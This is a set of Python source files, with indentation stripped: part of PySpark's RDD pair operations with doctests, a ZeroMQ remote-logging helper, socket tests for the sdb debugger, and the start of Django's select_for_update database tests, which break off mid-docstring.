>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in other have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
def partitionBy(self, numPartitions, partitionFunc=None):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
if partitionFunc is None:
partitionFunc = lambda x: 0 if x is None else hash(x)
# Transferring O(n) objects to Java is too expensive. Instead, we'll
# form the hash buckets in Python, transferring O(numPartitions) objects
# to Java. Each object is a (splitNumber, [objects]) pair.
outputSerializer = self.ctx._unbatched_serializer
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
for (k, v) in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
for (split, items) in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
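            # Each bucket is emitted as two consecutive stream items: the packed
            # target partition number, then the serialized list of its (k, v) pairs.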
keyed = PipelinedRDD(self, add_shuffle_key)
keyed._bypass_serializer = True
with _JavaStackTrace(self.context) as st:
pairRDD = self.ctx._jvm.PairwiseRDD(keyed._jrdd.rdd()).asJavaPairRDD()
partitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = pairRDD.partitionBy(partitioner).values()
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
# This is required so that id(partitionFunc) remains unique, even if
# partitionFunc is a lambda:
rdd._partitionFunc = partitionFunc
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
def combineLocally(iterator):
combiners = {}
for x in iterator:
(k, v) = x
if k not in combiners:
combiners[k] = createCombiner(v)
else:
combiners[k] = mergeValue(combiners[k], v)
return combiners.iteritems()
locally_combined = self.mapPartitions(combineLocally)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
combiners = {}
for (k, v) in iterator:
if not k in combiners:
combiners[k] = v
else:
combiners[k] = mergeCombiners(combiners[k], v)
return combiners.iteritems()
return shuffled.mapPartitions(_mergeCombiners)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral "zero value".
This function can return a different result type, U, than the type of the values in this RDD,
        V. Thus, we need one operation for merging a V into a U and one operation for merging two U's.
The former operation is used for merging values within a partition, and the latter is used
for merging values between partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
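        # Illustrative usage (a sketch, not a doctest):
        #   rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
        #   seqOp = lambda acc, v: acc + v    # fold a value into the per-key total
        #   combOp = lambda a, b: a + b       # merge totals from different partitions
        #   sorted(rdd.aggregateByKey(0, seqOp, combOp).collect())  # [('a', 3), ('b', 1)]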
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
        Hash-partitions the resulting RDD into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey will provide much
better performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
return a + b
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
# TODO: add tests
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
# TODO: support varargs cogroup of several RDDs.
def groupWith(self, other):
"""
Alias for cogroup.
"""
return self.cogroup(other)
    # TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup(self, other, numPartitions)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
filter_func = lambda (key, vals): len(vals[0]) > 0 and len(vals[1]) == 0
map_func = lambda (key, vals): [(key, val) for val in vals[0]]
return self.cogroup(other, numPartitions).filter(filter_func).flatMap(map_func)
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
rdd = other.map(lambda x: (x, True)) # note: here 'True' is just a placeholder
return self.map(lambda x: (x, True)).subtractByKey(rdd).map(lambda tpl: tpl[0]) # note: here 'True' is just a placeholder
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
        Zips this RDD with another one, returning key-value pairs made from the
        first element of each RDD, then the second element of each, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if not name_:
return None
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1')
>>> rdd1.name()
'RDD1'
"""
self._jrdd.setName(name)
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if not debug_string:
return None
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
# TODO: `lookup` is disabled because we can't make direct comparisons based
# on the key; we need to compare the hash of the key to the hash of the
# keys in the pairs. This could be an expensive operation, since those
# hashes aren't retained.
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
command = (self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_command = CloudPickleSerializer().dumps(command)
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in self.ctx._pickled_broadcast_vars],
self.ctx._gateway._gateway_client)
self.ctx._pickled_broadcast_vars.clear()
class_tag = self._prev_jrdd.classTag()
env = MapConverter().convert(self.ctx.environment,
self.ctx._gateway._gateway_client)
includes = ListConverter().convert(self.ctx._python_includes,
self.ctx._gateway._gateway_client)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_command), env, includes, self.preservesPartitioning,
self.ctx.pythonExec, broadcast_vars, self.ctx._javaAccumulator,
class_tag)
self._jrdd_val = python_rdd.asJavaRDD()
return self._jrdd_val
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
(failure_count, test_count) = doctest.testmod(globs=globs,optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
remote_logging.py
|
import logging
import threading
import zmq
from zmq.log.handlers import PUBHandler
from context import get_context
logger = logging.getLogger("LoggingConfig")
__log_context__ = {}
class CustomFormatter(logging.Formatter):
"""Logging Formatter to add colors and count warning / errors"""
grey = "\x1b[38;21m"
cyan = "\x1b[36;21m"
yellow = "\x1b[33;21m"
red = "\x1b[31;21m"
bold_red = "\x1b[31;1m"
reset = "\x1b[0m"
form = "%(name)s | %(asctime)s | %(message)s"
db_form = "%(name)s | %(asctime)s | %(message)s | (%(filename)s:%(lineno)d)"
FORMATS = {
logging.DEBUG: grey + db_form + reset,
logging.INFO: cyan + form + reset,
logging.WARNING: yellow + form + reset,
logging.ERROR: red + db_form + reset,
logging.CRITICAL: bold_red + db_form + reset,
}
def format(self, record):
log_fmt = self.FORMATS.get(record.levelno)
formatter = logging.Formatter(log_fmt)
return formatter.format(record)
def add_custom_log_handler():
base_logger = logging.getLogger()
base_logger.setLevel(logging.DEBUG)
sh = logging.StreamHandler()
sh.setLevel(level=logging.DEBUG)
sh.setFormatter(CustomFormatter())
base_logger.addHandler(sh)
def set_zmq_log_handler():
context = get_context()
connect_address = context.get("remote_log_connect")
ctx = zmq.Context().instance()
log_sock = ctx.socket(zmq.PUB)
log_sock.connect(connect_address)
zmq_log_handler = PUBHandler(log_sock)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logger.addHandler(zmq_log_handler)
logger.socket = log_sock
__log_context__["log_sock"] = log_sock
zmq_log_handler.setFormatter(CustomFormatter())
if hasattr(zmq_log_handler, "setRootTopic"):
topic = context.get("remote_log_topic", "FedableLogger")
zmq_log_handler.setRootTopic(topic)
return logger
def cleanup_logging():
if "log_sock" in __log_context__:
__log_context__["log_sock"].close()
logging.shutdown()
def start_logging_proxy_thread():
t = threading.Thread(target=start_logging_proxy, daemon=True,)
t.start()
return t
def start_logging_proxy():
ctx = zmq.Context().instance()
context = get_context()
    bind_address_front = context.get("remote_log_bind_front", "tcp://*:8880")
    bind_address_back = context.get("remote_log_bind_back", "tcp://*:8881")
frontend = ctx.socket(zmq.SUB)
try:
frontend.bind(bind_address_front)
except zmq.ZMQError as e:
logging.warning("Unable to bind remote log proxy. Address in use?")
logging.error(e)
return
frontend.setsockopt(zmq.SUBSCRIBE, b"")
# Socket facing services
backend = ctx.socket(zmq.PUB)
try:
backend.bind(bind_address_back)
except zmq.ZMQError as e:
logging.warning("Unable to bind remote log proxy. Address in use?")
logging.error(e)
return
zmq.proxy(frontend, backend)
def configure_logging(enable_remote):
if enable_remote:
context = get_context()
if context.get("remote_log_proxy", True):
start_logging_proxy_thread()
set_zmq_log_handler()
base_logger = logging.getLogger()
base_logger.setLevel(logging.DEBUG)
sh = logging.StreamHandler()
sh.setLevel(level=logging.DEBUG)
sh.setFormatter(CustomFormatter())
base_logger.addHandler(sh)
logging.getLogger("matplotlib").setLevel(logging.WARNING)
if enable_remote:
logger.info("Configuring remote logging")
else:
logger.info("Not configuring remote logging")
|
test_socket.py
|
import inspect
import multiprocessing
import select
import socket
import unittest
import pexpect
import six
import sdb
HOST = '127.0.0.1'
class TestSocketTrace(unittest.TestCase):
def setUp(self):
# call set_trace() in a child process so we can connect to it
p = multiprocessing.Process(target=self.set_trace)
p.start()
# listen for UDP announcement packets
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((HOST, 6899))
r, w, x = select.select([sock], [], [])
for i in r:
self.port = i.recv(1024).decode('utf-8')
def set_trace(self):
sdb.Sdb(notify_host=HOST, colorize=False).set_trace()
class TestBasicConnectivity(TestSocketTrace):
def test_udp_announcement(self):
assert 6899 <= int(self.port) < 7000
child = pexpect.spawn('telnet', [HOST, self.port])
child.sendline('c')
child.expect([pexpect.EOF])
assert not child.isalive()
class TestControlCommands(TestSocketTrace):
def assert_command_yields(self, command, expected_lines):
stdout = six.BytesIO() if six.PY3 else six.StringIO()
child = pexpect.spawn('telnet', [HOST, self.port])
child.logfile_read = stdout
child.sendline(command)
child.sendline('c')
child.expect([pexpect.EOF])
assert not child.isalive()
for line in expected_lines:
assert line.encode('utf-8') in stdout.getvalue()
def test_list(self):
self.assert_command_yields(
'list',
[l.strip() for l in inspect.getsourcelines(self.set_trace)[0]]
)
def test_bt(self):
self.assert_command_yields(
'bt',
'> ' + __file__
)
def test_locals_alias(self):
self.assert_command_yields(
'?',
"['__return__', 'self']"
)
def test_completion_alias(self):
self.assert_command_yields(
'sdb?',
"'SDB_HOST',"
)
def test_sourcelines_alias(self):
self.assert_command_yields(
'sdb.listen??',
['def listen():']
)
def test_tab_completion(self):
self.assert_command_yields(
'sdb.set_tr<!TAB!>',
'sdb.set_trace()'
)
def test_command_repeat(self):
self.assert_command_yields(
'3p "Hello, World!"',
'Hello, World!\nHello, World!\nHello, World!\n'
)
def test_print_undefined(self):
self.assert_command_yields(
'undefined',
"NameError: name 'undefined' is not defined"
)
def test_print_empty_string(self):
self.assert_command_yields('""', '""\n')
def test_print_nonetype(self):
self.assert_command_yields('None', 'None\n')
def test_setlines(self):
stdout = six.BytesIO() if six.PY3 else six.StringIO()
child = pexpect.spawn('telnet', [HOST, self.port])
child.logfile_read = stdout
# signal that we only want 10 lines of output, and then read the buffer
child.sendline('lines 10')
child.expect([pexpect.TIMEOUT], timeout=0.1)
# the next list call should only return 10 lines of output
stdout = six.BytesIO() if six.PY3 else six.StringIO()
child.logfile_read = stdout
child.sendline('l')
child.sendline('c')
child.expect([pexpect.EOF])
assert not child.isalive()
# strip off everything before the "c" continue command
lines = stdout.getvalue().splitlines()
assert len(lines[:lines.index(
'c' if six.PY2 else b'c'
)]) == 10
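# The setUp above captures the handshake these tests depend on: sdb.set_trace()
# announces its listening TCP port in a UDP datagram, which the test reads
# before attaching over telnet. The same "wait for the announced port" step is
# sketched as a standalone helper below, for illustration only; the defaults
# are assumptions mirroring the constants used in this file.
def wait_for_announced_port(host=HOST, udp_port=6899, bufsize=1024):
    """Illustrative only: block until an sdb UDP announcement arrives."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, udp_port))
    try:
        readable, _, _ = select.select([sock], [], [])
        # The datagram payload is the TCP port the debugger is listening on.
        return readable[0].recv(bufsize).decode('utf-8')
    finally:
        sock.close()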
|
tests.py
|
import threading
import time
from unittest import mock
from multiple_database.routers import TestRouter
from django.core.exceptions import FieldError
from django.db import (
DatabaseError, NotSupportedError, connection, connections, router,
transaction,
)
from django.test import (
TransactionTestCase, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import CaptureQueriesContext
from .models import (
City, CityCountryProxy, Country, EUCity, EUCountry, Person, PersonProfile,
)
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
# This is executed in autocommit mode so that code in
# run_select_for_update can see this data.
self.country1 = Country.objects.create(name='Belgium')
self.country2 = Country.objects.create(name='France')
self.city1 = City.objects.create(name='Liberchies', country=self.country1)
self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
self.person_profile = PersonProfile.objects.create(person=self.person)
# We need another database connection in transaction to test that one
# connection issuing a SELECT ... FOR UPDATE will block.
self.new_connection = connection.copy()
def tearDown(self):
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
self.new_connection.close()
def start_blocking_transaction(self):
self.new_connection.set_autocommit(False)
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.cursor.close()
self.new_connection.rollback()
self.new_connection.set_autocommit(True)
def has_for_update_sql(self, queries, **kwargs):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = connection.ops.for_update_sql(**kwargs)
return any(for_update_sql in query['sql'] for query in queries)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
The backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(ctx.captured_queries))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
The backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_for_update_sql_generated_skip_locked(self):
"""
The backend's FOR UPDATE SKIP LOCKED variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(skip_locked=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))
@skipUnlessDBFeature('has_select_for_no_key_update')
def test_update_sql_generated_no_key(self):
"""
The backend's FOR NO KEY UPDATE variant appears in generated SQL when
select_for_update() is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(no_key=True))
self.assertIs(self.has_for_update_sql(ctx.captured_queries, no_key=True), True)
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_generated_of(self):
"""
The backend's FOR UPDATE OF variant appears in the generated SQL when
select_for_update() is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.select_related(
'born__country',
).select_for_update(
of=('born__country',),
).select_for_update(
of=('self', 'born__country')
))
features = connections['default'].features
if features.select_for_update_of_column:
expected = [
'select_for_update_person"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_person', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self',)))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_eucountry"."country_ptr_id']
else:
expected = ['select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self', 'country_ptr',)))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucountry"."country_ptr_id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucountry', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_related_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_eucountry"."country_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_nested_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country__country_ptr',),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_multilevel_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(
of=('country_ptr', 'country_ptr__entity_ptr'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_country"."entity_ptr_id',
'select_for_update_entity"."id',
]
else:
expected = ['select_for_update_country', 'select_for_update_entity']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_proxy_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(CityCountryProxy.objects.select_related(
'country',
).select_for_update(
of=('country',),
))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_country"."entity_ptr_id']
else:
expected = ['select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values('pk'))
self.assertEqual(values, [{'pk': self.person.pk}])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values_list(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
self.assertEqual(values, [(self.person.pk,)])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_self_when_self_is_not_selected(self):
"""
select_for_update(of=['self']) when the only columns selected are from
related tables.
"""
with transaction.atomic():
values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name'))
self.assertEqual(values, [{'born__name': self.city1.name}])
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_skip_locked_skips_locked_rows(self):
"""
If skip_locked is specified, the locked row is skipped resulting in
Person.DoesNotExist.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'skip_locked': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], Person.DoesNotExist)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
